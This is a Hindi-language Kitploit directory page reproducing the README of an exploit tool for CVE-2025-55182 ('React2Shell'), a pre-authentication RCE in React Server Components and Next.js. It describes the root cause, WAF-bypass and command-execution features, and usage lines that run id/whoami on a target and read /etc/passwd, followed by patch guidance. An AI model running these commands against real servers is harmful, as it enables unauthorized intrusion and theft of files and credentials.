Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182 — प्री-ऑथेंटिकेशन RCE एक्सप्लॉइट CVE-2025-55182 (React2Shell) के लिए जो React Server Components को लक्षित करता है। इसमें स्कैनिंग, OAST सत्यापन, WAF बायपास, कमांड निष्पादन और फ़ाइल पढ़ने की सुविधाएँ शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/sentinelxofficial/cve-2025-55182
टोहीभेद्यता विश्लेषणशोषणआईडीएस/आईपीएस से बचनावेब एप्लिकेशन शोषणWAF बाईपासपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
sentinelxofficial/cve-2025-55182

CVE-2025-55182

प्री-ऑथेंटिकेशन RCE एक्सप्लॉइट CVE-2025-55182 (React2Shell) के लिए जो React Server Components को लक्षित करता है। इसमें स्कैनिंग, OAST सत्यापन, WAF बायपास, कमांड निष्पादन और फ़ाइल पढ़ने की सुविधाएँ शामिल हैं।

रिपॉजिटरी देखें
12 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-55182 — React2Shell

प्री-ऑथेंटिकेशन रिमोट कोड एक्सीक्यूशन रिएक्ट सर्वर कंपोनेंट्स (RSC), नेक्स्ट.जेएस और संबंधित फ्रेमवर्क में।

CVE CVSS Type Author


अवलोकन

CVE-2025-55182 (जिसे React2Shell भी कहा जाता है) रिएक्ट सर्वर कंपोनेंट्स (RSC) इकोसिस्टम को प्रभावित करने वाली एक गंभीर प्री-ऑथेंटिकेशन RCE कमजोरी है। एक अप्रमाणित हमलावर एक ही तैयार HTTP POST अनुरोध के साथ एक कमजोर सर्वर से पूरी तरह समझौता कर सकता है।

तकनीकी विश्लेषण

मूल कारण

रिएक्ट सर्वर कंपोनेंट्स फंक्शन रेफरेंस और मॉड्यूल कॉल को क्रमबद्ध करने के लिए React Flight नामक एक कस्टम वायर फॉर्मेट का उपयोग करते हैं। कमजोरी पेलोड डिकोडिंग तंत्र में मौजूद है जो RSC एंडपॉइंट पर आने वाले POST अनुरोधों को संसाधित करता है।

जब सर्वर को एक React Flight पेलोड प्राप्त होता है, तो यह पर्याप्त सत्यापन के बिना सामग्री को डिसीरियलाइज़ करता है, हमलावर-नियंत्रित $$typeof फील्ड्स और मॉड्यूल रेफरेंस रिज़ॉल्यूशन पर भरोसा करता है। यह एक हमलावर को अनुमति देता है:

  1. मनमाने Node.js बिल्ट-इन मॉड्यूल्स (जैसे child_process, fs, net) को संदर्भित करने की
  2. $F (फंक्शन) टाइप मार्कर के माध्यम से फंक्शन कॉल को चेन करने की
  3. Node.js सर्वर रनटाइम के अंतर्गत मनमाना कोड निष्पादित करने की

प्रभावित संस्करण

CVSS

root@kitploit:~

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0 Critical


विशेषताएँ

  • स्कैन – कमजोर RSC एंडपॉइंट का पता लगाएं और Next.js/React संस्करणों की फिंगरप्रिंटिंग करें।
  • सत्यापित करें (OAST) – DNS/HTTP कॉलबैक के माध्यम से RCE की पुष्टि करने के लिए आउट-ऑफ-बैंड पेलोड भेजें।
  • बायपास – व्यापक WAF/IDS चोरी: कंटेंट-टाइप म्यूटेशन, पेलोड एन्कोडिंग, हेडर स्पूफिंग, पथ वेरिएंट और WAF पेलोड।
  • निष्पादित करें – लक्ष्य पर मनमाना सिस्टम कमांड चलाएं (जैसे id, whoami)।
  • पढ़ें – सर्वर से मनमानी फ़ाइलें पढ़ें (जैसे /etc/passwd, package.json)।
  • JSON आउटपुट – एकीकरण के लिए मशीन-पठनीय परिणाम।

स्थापना

root@kitploit:~
git clone https://github.com/SentinelXofficial/CVE-2025-55182
cd CVE-2025-55182
pip install -r requirements.txt

उपयोग

मूल स्कैन

root@kitploit:~
python3 poc.py -t https://target.com
python3 poc.py -t https://target.com --timeout 15
python3 poc.py -t https://target.com --json

OAST के साथ RCE सत्यापित करें

root@kitploit:~
python3 poc.py -t https://target.com -m verify --oast your.oast.domain

पूर्ण बायपास परीक्षण

root@kitploit:~
python3 poc.py -t https://target.com -m bypass --verbose

कमांड निष्पादित करें

root@kitploit:~
python3 poc.py -t https://target.com -m exec --cmd "id"
python3 poc.py -t https://target.com -m exec --cmd "whoami" --timeout 20

फ़ाइलें पढ़ें

root@kitploit:~
python3 poc.py -t https://target.com -m read --file "/etc/passwd"
python3 poc.py -t https://target.com -m read --file "/app/package.json"

प्रॉक्सी का उपयोग करें (जैसे Burp Suite)

root@kitploit:~
python3 poc.py -t https://target.com --proxy http://127.0.0.1:8080

फ़ाइल संरचना

root@kitploit:~
CVE-2025-55182/
├── README.md
├── poc.py
├── requirements.txt
└── exploit/
    ├── __init__.py
    ├── payloads.py
    ├── scanner.py
    ├── bypass.py
    └── rce.py

शमन

पैच (अनुशंसित)

root@kitploit:~
npm install [email protected]
npm install [email protected] [email protected]

अस्थायी कार्य-योजना

· सर्वर फंक्शन्स ("use server") को निष्क्रिय करें · Content-Type: text/x-component को ब्लॉक करने के लिए WAF नियम · RSC एंडपॉइंट के लिए नेटवर्क सेगमेंटेशन


संदर्भ

· https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components · https://www.cve.org/CVERecord?id=CVE-2025-55182 · https://nvd.nist.gov/vuln/detail/CVE-2025-55182


अस्वीकरण: केवल अधिकृत सुरक्षा परीक्षण के लिए।

लेखक: SentinelX · https://t.me/SentinelXsecurity

root@kitploit:~
टूल डाउनलोड करें
पैकेजकमजोरपैच किया गया
react-server-dom-webpack19.0.0 – 19.2.0≥ 19.2.1
react-server-dom-parcel19.0.0 – 19.2.0≥ 19.2.1
react-server-dom-turbopack19.0.0 – 19.2.0≥ 19.2.1
next (13.x)13.3.0 – 13.5.x≥ 14.2.35
next (14.x)14.0.0 – 14.2.34≥ 14.2.35
next (15.x)15.0.0+ (पैच देखें)पैच किए गए रिलीज़